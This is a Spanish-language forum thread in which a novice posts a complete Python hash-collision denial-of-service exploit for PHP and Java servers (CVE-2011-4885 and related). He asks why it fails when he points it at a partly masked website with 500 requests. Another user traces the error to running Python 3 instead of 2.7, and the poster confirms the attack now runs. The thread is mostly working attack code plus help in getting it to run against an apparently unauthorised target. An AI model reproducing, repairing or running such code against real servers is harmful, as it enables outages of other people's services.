no encuentro el erro ayuda!

[ediporey2000]

Hola este es el code de un exploit pero no encuentro el error es q en python y en general soy noob xD

Código [Seleccionar] Expandir

#! /usr/bin/env python

"""
This script was written by Christian Mehlmauer <FireFart@gmail.com>
https://twitter.com/#!/_FireFart_

Sourcecode online at:
https://github.com/FireFart/HashCollision-DOS-POC

Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision

http://www.ocert.org/advisories/ocert-2011-003.html
CVE:
Apache Geronimo: CVE-2011-5034
Oracle Glassfish: CVE-2011-5035
PHP: CVE-2011-4885
Apache Tomcat: CVE-2011-4858

requires Python 2.7

Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP

-) Take down a PHP server(make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP

-) Take down a JAVA server(make 500 requests without waiting for a response, maximum POST data size 2MB):
python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2

Changelog:
v6.0: Added Javapayloadgenerator
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""

import socket
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools

class Payloadgenerator:
   # Maximum recursions when searching for collisionchars
   _recursivemax = 15
   _recursivecounter = 1
   
   def __init__(self, verbose, collisionchars = 5, collisioncharlength = 2, payloadlength = 8):
       self._verbose = verbose
       self._collisionchars = collisionchars
       self._collisioncharlength = collisioncharlength
       self._payloadlength = payloadlength
   
   def generateASPPayload(self):
       raise Exception("ASP Payload not implemented")
   
   def generateJAVAPayload(self):
       a = self._computeJAVACollisionChars(self._collisionchars)
       return self._generatePayload(a, self._payloadlength)
   
   def generatePHPPayload(self):
       # Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
       # compute entries with collisions in PHP hashtable hash function
       a = self._computePHPCollisionChars(self._collisionchars)
       return self._generatePayload(a, self._payloadlength);
   
   def _computePHPCollisionChars(self, count):
       charrange = range(0, 256)
       return self._computeCollisionChars(self._DJBX33A, count, charrange)
   
   def _computeJAVACollisionChars(self, count):
       charrange = range(0, 129)
       return self._computeCollisionChars(self._DJBX31A, count, charrange)
   
   def _computeCollisionChars(self, function, count, charrange):
       hashes = {}
       counter = 0
       length = self._collisioncharlength
       a = ""
       for i in charrange:
           a = a+chr(i)
       source = list(itertools.product(a, repeat=length))
       basestr = ''.join(random.choice(source))
       basehash = function(basestr)
       hashes[str(counter)] = basestr
       counter = counter + 1
       for item in source:
           tempstr = ''.join(item)
           if tempstr == basestr:
               continue
           if function(tempstr) == basehash:
               hashes[str(counter)] = tempstr
               counter = counter + 1
           if counter >= count:
               break;
       if counter < count:
           # Try it again
           if self._recursivecounter > self._recursivemax:
               print("Not enought values found. Please start this script again")
               sys.exit(1)
           print("%d: Not enough values found. Trying it again..." % self._recursivecounter)
           self._recursivecounter = self._recursivecounter + 1
           hashes = self._computeCollisionChars(function, count, charrange)
       else:
           if self._verbose:
               print("Found values:")
               for item in hashes:
                   tempstr = hashes[item]
                   print("\tValue: %s\tHash: %s" % (tempstr, function(tempstr)))
                   for i in tempstr:
                       print("\t\tValue: %s\tCharcode: %d" % (i, ord(i)))
       return hashes
   
   def _DJBXA(self, inputstring, base, start):
       counter = len(inputstring) - 1
       result = start
       for item in inputstring:
           result = result + (math.pow(base, counter) * ord(item))
           counter = counter - 1
       return int(round(result))
   
   #PHP
   def _DJBX33A(self, inputstring):
       return self._DJBXA(inputstring, 33, 5381)
   
   #Java
   def _DJBX31A(self, inputstring):
       return self._DJBXA(inputstring, 31, 0)
   
   #ASP
   def _DJBX33X(self, inputstring):
       counter = len(inputstring) - 1
       result = 5381
       for item in inputstring:
           result = result + (int(round(math.pow(33, counter))) ^ ord(item))
           counter = counter - 1
       return int(round(result))
   
   def _generatePayload(self, collisionchars, payloadlength):
       # Taken from:
       # https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
   
       # how long should the payload be
       length = payloadlength
       size = len(collisionchars)
       post = ""
       maxvaluefloat = math.pow(size,length)
       maxvalueint = int(math.floor(maxvaluefloat))
       for i in range (maxvalueint):
           inputstring = self._base_convert(i, size)
           result = inputstring.rjust(length, "0")
           for item in collisionchars:
               result = result.replace(str(item), collisionchars[item])
           post += urllib.urlencode({result:""}) + "&"
   
       return post;
   
   def _base_convert(self, num, base):
       fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
       alphabet = fullalphabet[:base]
       if (num == 0):
           return alphabet[0]
       arr = []
       base = len(alphabet)
       while num:
           rem = num % base
           num = num // base
           arr.append(alphabet[rem])
       arr.reverse()
       return "".join(arr)

def main():
   parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit")
   parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
   parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
   parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
   parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
   parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
   parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
   parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
   parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
   parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int)
   parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true")
   parser.add_argument("--version", action="version", version="%(prog)s 6.0")

   options = parser.parse_args()
   
   if options.target == "PHP":
       if not options.maxpayloadsize or options.maxpayloadsize == 0:
           maxpayloadsize = 8
       else:
           maxpayloadsize = options.maxpayloadsize
   elif options.target == "ASP":
       if not options.maxpayloadsize or options.maxpayloadsize == 0:
           maxpayloadsize = 8
       else:
           maxpayloadsize = options.maxpayloadsize
   elif options.target == "JAVA":
       if not options.maxpayloadsize or options.maxpayloadsize == 0:
           maxpayloadsize = 2
       else:
           maxpayloadsize = options.maxpayloadsize
   else:
       print("Target %s not yet implemented" % options.target)
       sys.exit(1)

   url = urlparse.urlparse(options.url)

   if not url.scheme:
       print("Please provide a scheme to the URL(http://, https://,..")
       sys.exit(1)

   host = url.hostname
   path = url.path
   port = url.port
   if not port:
       if url.scheme == "https":
           port = 443
       elif url.scheme == "http":
           port = 80
       else:
           print("Unsupported Protocol %s" % url.scheme)
           sys.exit(1)
   if not path:
       path = "/"

   if not options.payload:
       print("Generating Payload...")
       
       # Number of colliding chars to find
       collisionchars = 5
       # Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)
       collisioncharlength = 2
       # Length of each parameter in the payload
       payloadlength = 8
       generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength)
       if options.target == "PHP":
           payload = generator.generatePHPPayload()
       elif options.target == "ASP":
           #payload = generateASPPayload()
           print("Target %s not yet implemented" % options.target)
           sys.exit(1)
       elif options.target == "JAVA":
           payload = generator.generateJAVAPayload()
       else:
           print("Target %s not yet implemented" % options.target)
           sys.exit(1)

       print("Payload generated")
   else:
       f = open(options.payload, "r")
       payload = f.read()
       f.close()
       print("Loaded Payload from %s" % options.payload)

   # trim to maximum payload size (in MB)
   maxinmb = maxpayloadsize*1024*1024
   payload = payload[:maxinmb]
   # remove last invalid(cut off) parameter
   position = payload.rfind("=&")
   payload = payload[:position+1]
   
   # Save payload
   if options.save:
       f = open(options.save, "w")
       f.write(payload)
       f.close()
       print("Payload saved to %s" % options.save)

   # User selected to only generate the payload
   if options.generate:
       return

   print("Host: %s" % host)
   print("Port: %s" % str(port))
   print("path: %s" % path)
   print
   print

   for i in range(options.count):
       print("sending Request #%s..." % str(i+1))
       sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       if url.scheme == "https":
           ssl_sock = ssl.wrap_socket(sock)
           ssl_sock.connect((host, port))
           ssl_sock.settimeout(None)
       else:
           sock.connect((host, port))
           sock.settimeout(None)

       request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)

       if url.scheme == "https":
           ssl_sock.send(request)
       else:
           sock.send(request)

       if options.verbose:
           if len(request) > 400:
               print(request[:400]+"....")
           else:
               print(request)
           print("")
       if options.wait or options.output:
           start = time.time()
           if url.scheme == "https"
               data = ssl_sock.recv(1024)
               string = ""
               while len(data):
                   string = string + data
                   data = ssl_sock.recv(1024)
           else:
               data = sock.recv(1024)
               string = ""
               while len(data):
                   string = string + data
                   data = sock.recv(1024)
           
           elapsed = (time.time() - start)
           print("Request %s finished" % str(i+1))
           print("Request %s duration: %s" % (str(i+1), elapsed))
           split = string.partition("\r\n\r\n")
           header = split[0]
           content = split[2]
           if options.verbose:
               # only print http header
               print("")
               print(header)
               print("")
           if options.output:
               f = open(options.output+str(i)+".html", "w")
               f.write("<!-- "+header+" -->\r\n"+content)
               f.close()

       if url.scheme == "https":
           ssl_sock.close()
           sock.close()
       else:
           sock.close()

if __name__ == "__main__":
   main()




este es el error q me teria cuando lo ejecuto

C:\Users\c****\Desktop>exp.py -u http://www.me******.com -v -c 500 -t php
Traceback (most recent call last):
 File "C:\Users\c****\Desktop\exp.py", line 359, in <module>
   main()
 File "C:\Users\c****n\Desktop\exp.py", line 216, in main
   url = urlparse.urlparse(options.url)
NameError: global name 'urlparse' is not defined

les agradezco su colaboración

[adastra]

 Tiene pinta de que has instalado mal Python, porque urlparse es de la a`pi core y veo que la estas importando, que versión de python usas?
Lo otro es, para compilar y ejecutar el exploit, se necesita alguna dependencia? a lo mejor desde el sitio donde lo has descargado encuentras que librerias necesitas y puede ser que alguna no la tengas instalada, (openssl, por ejemplo).
Si no es un problema de la instalación de python es un problema de dependencias.

[ediporey2000]

se tenias toda la razón tenia la versión 3.2 e instale la versión 2.7 de phyton y ya funciono xD grax